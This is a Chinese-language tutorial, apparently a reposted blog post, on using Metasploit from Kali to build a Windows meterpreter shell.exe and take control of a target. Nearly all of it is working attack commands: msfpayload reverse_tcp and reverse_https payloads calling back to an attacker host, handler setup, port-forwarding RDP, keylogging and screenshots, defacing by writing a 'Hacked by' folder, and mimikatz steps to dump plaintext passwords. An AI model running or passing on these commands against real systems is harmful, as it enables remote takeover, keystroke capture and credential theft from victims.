kali生成shell監聽目標主機


生成監聽用的shell.exe:

reverse_tcp(反向連接)

path : payload/windows/meterpreter/reverse_tcp

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=8080 X > ~/Desktop/shell.exe

 

reverse_http/https(反向連接)

path:payload/windows/meterpreter/reverse_http/https

msfpayload windows/meterpreter/reverse_https LHOST=192.168.1.2 LPORT=8080 X > ~/Desktop/shell.exe

通過http/https的方式反向連接,在網速慢的情況下不穩定,在某博客上看到https如果反彈沒有收到數據,可以將監聽端口換成443試試。

 

bind_tcp(正向連接)

path : payload/windows/meterpreter/bind_tcp

正向連接shell,因為在內網跨網段時無法連接到attack的機器,所以在內網中經常會使用,不需要設置LHOST。

 

 

利用shell.exe監聽:

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST 192.168.1.2

msf exploit(handler) > set LPORT 8080

msf exploit(handler) > exploit -j

msf exploit(handler) >sessions

 

基本命令:

enter image description here

常用命令:

background:將當前會話放置后台 load/use:加載模塊 Interact:切換進一個信道 migrate:遷移進程 run:執行一個已有的模塊,這里要說的是輸入run后按兩下tab,會列出所有的已有的腳本,常用的有autoroute,hashdump,arp_scanner,multi_meter_inject等。 Resource:執行一個已有的rc腳本。

寫入文件夾:
meterpreter > pwd
meterpreter > cd C:\\
meterpreter > pwd
meterpreter > mkdir Hacked by AutoRoot
meterpreter > ls

 

寫入內容:

edit + 文件,調用vi編輯。

 

網絡相關:

網絡命令則有列出ip信息(ipconfig),展示修改路由表(route),還有端口轉發(portfwd)

meterpreter > portfwd
meterpreter > portfwd add -l 1314 -p 3389 -r 192.168.1.2

在建立規則之后就可以連接本地1314端口,這樣遠程的3389端口就轉發出來了

 

鍵盤監聽:

meterpreter > screenshot
meterpreter > keyscan_start
meterpreter > keyscan_dump

注意一下windows會話窗口的概念,windows桌面划分為不同的會話(session),以便於與windows交互。會話0代表控制台,1,2 代表遠程桌面。所以要截獲鍵盤輸入必須在0中進行。可 以使用getdesktop查看或者截張圖試試。否則使用setdesktop切換。

如果不行就切換到explorer.exe進程中,這樣也可以監聽到遠程桌面連接進來之后的鍵盤輸入數據。

 

mimikatz:

抓取明文

第一條:privilege::debug
                //提升權限
第二條:sekurlsa::logonpasswords
              //抓取密碼

 

 

 



 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM